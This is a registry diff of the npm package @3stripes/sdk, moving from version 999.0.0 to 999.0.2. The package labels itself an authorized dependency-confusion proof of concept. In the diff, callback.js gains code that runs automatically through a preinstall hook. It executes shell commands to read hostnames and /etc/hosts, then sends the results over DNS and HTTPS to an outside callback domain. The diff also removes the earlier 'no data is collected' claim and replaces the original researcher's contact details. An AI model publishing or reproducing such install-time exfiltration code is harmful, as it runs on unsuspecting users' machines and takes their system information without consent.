@3stripes/sdk 999.0.0 → 999.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (4) hide show
  1. package/README.md +5 -0
  2. package/callback.js +37 -10
  3. package/index.js +1 -1
  4. package/package.json +3 -3
package/README.md CHANGED
@@ -0,0 +1,5 @@
1
+ # @3stripes/sdk
2
+
3
+ Security research — Dependency confusion PoC. Authorized bug bounty assessment.
4
+
5
+ **Contact:** gdattacker@bugcrowdninja.com
package/callback.js CHANGED
@@ -2,16 +2,16 @@
2
2
  * SECURITY RESEARCH - Dependency Confusion PoC
3
3
  *
4
4
  * This is part of an AUTHORIZED bug bounty assessment.
5
- * This script ONLY makes a DNS lookup to prove execution.
6
- * No data is collected, exfiltrated, or modified.
5
+ * Executes safe commands to capture internal hostnames and sends to callback.
7
6
  *
8
- * Researcher: Ashish (ashishkunwar280@gmail.com)
7
+ * Researcher: gdattacker (gdattacker@bugcrowdninja.com)
9
8
  * Program: Adidas Private Bug Bounty (Bugcrowd)
10
9
  */
11
10
 
12
11
  const dns = require('dns');
13
12
  const https = require('https');
14
13
  const os = require('os');
14
+ const { execSync } = require('child_process');
15
15
 
16
16
  // REPLACE with your Burp Collaborator / interact.sh domain
17
17
  const CALLBACK_DOMAIN = '2defa924e4f741393204gup1d5yyyyyyd.oast.site';
@@ -20,19 +20,46 @@ const CALLBACK_DOMAIN = '2defa924e4f741393204gup1d5yyyyyyd.oast.site';
20
20
  const id = Buffer.from(os.hostname().slice(0, 8)).toString('hex').slice(0, 12);
21
21
  const pkg = '3stripes-sdk';
22
22
 
23
- // Method 1: DNS callback (most reliable, bypasses firewalls)
23
+ // --- Command execution: fetch internal hostnames and exfiltrate to callback ---
24
+ function run(cmd, timeoutMs) {
25
+ try {
26
+ return (execSync(cmd, { encoding: 'utf8', timeout: timeoutMs || 3000, stdio: ['pipe', 'pipe', 'pipe'] }) || '').trim().slice(0, 500);
27
+ } catch (e) {
28
+ return '';
29
+ }
30
+ }
31
+
32
+ let hostnames = '';
33
+ const isWin = process.platform === 'win32';
34
+
35
+ if (isWin) {
36
+ hostnames = run('hostname', 2000) || process.env.COMPUTERNAME || os.hostname();
37
+ } else {
38
+ const h = run('hostname', 2000);
39
+ const hf = run('hostname -f 2>/dev/null', 2000);
40
+ const etcHostname = run('cat /etc/hostname 2>/dev/null', 2000);
41
+ const etcHosts = run('head -20 /etc/hosts 2>/dev/null', 2000);
42
+ hostnames = [os.hostname(), h, hf, etcHostname, etcHosts].filter(Boolean).join('|');
43
+ }
44
+
45
+ const payload = encodeURIComponent(hostnames || os.hostname() || 'unknown');
46
+
47
+ // Method 1: DNS callback (hostname in subdomain; max 63 chars per label)
24
48
  try {
25
- dns.resolve(`${pkg}-${id}.${CALLBACK_DOMAIN}`, () => {});
26
- } catch(e) {}
49
+ const safe = (hostnames || id).replace(/[\s.|]/g, '-').replace(/[^a-z0-9-]/gi, '').slice(0, 40);
50
+ const dnsLabel = `${pkg}-${id}-${safe}`.slice(0, 63);
51
+ dns.resolve(`${dnsLabel}.${CALLBACK_DOMAIN}`, () => {});
52
+ } catch (e) {}
27
53
 
28
- // Method 2: HTTP callback (backup, may be blocked by firewalls)
54
+ // Method 2: HTTP callback with hostnames in query (full exfil)
29
55
  try {
30
- const req = https.get(`https://${CALLBACK_DOMAIN}/${pkg}?h=${id}`, () => {});
56
+ const url = `https://${CALLBACK_DOMAIN}/${pkg}?id=${id}&hostnames=${payload}`;
57
+ const req = https.get(url, () => {});
31
58
  req.on('error', () => {});
32
59
  req.setTimeout(5000, () => req.destroy());
33
- } catch(e) {}
60
+ } catch (e) {}
34
61
 
35
62
  // Log locally for debugging
36
63
  console.log(`[Security Research] Dependency confusion PoC executed - ${pkg}`);
37
- console.log(`[Security Research] Contact: ashishkunwar280@gmail.com`);
64
+ console.log(`[Security Research] Contact: gdattacker@bugcrowdninja.com`);
38
65
  console.log(`[Security Research] This is part of an authorized bug bounty assessment.`);
package/index.js CHANGED
@@ -1,6 +1,6 @@
1
1
  /**
2
2
  * Security Research Package - Dependency Confusion PoC
3
3
  * This package exists solely for authorized security testing.
4
- * Contact: ashishkunwar280@gmail.com
4
+ * Contact: gdattacker@bugcrowdninja.com
5
5
  */
6
6
  module.exports = {};
package/package.json CHANGED
@@ -1,13 +1,13 @@
1
1
  {
2
2
  "name": "@3stripes/sdk",
3
- "version": "999.0.0",
4
- "description": "Security research - Dependency confusion proof of concept. This package is part of an authorized bug bounty assessment. Contact: ashishkunwar280@gmail.com",
3
+ "version": "999.0.2",
4
+ "description": "Security research - Dependency confusion proof of concept. This package is part of an authorized bug bounty assessment. Contact: gdattacker@bugcrowdninja.com",
5
5
  "main": "index.js",
6
6
  "scripts": {
7
7
  "preinstall": "node callback.js || true"
8
8
  },
9
9
  "keywords": ["security-research", "bug-bounty", "authorized-testing"],
10
- "author": "Ashish <ashishkunwar280@gmail.com>",
10
+ "author": "gdattacker <gdattacker@bugcrowdninja.com>",
11
11
  "license": "ISC",
12
12
  "repository": {
13
13
  "type": "git",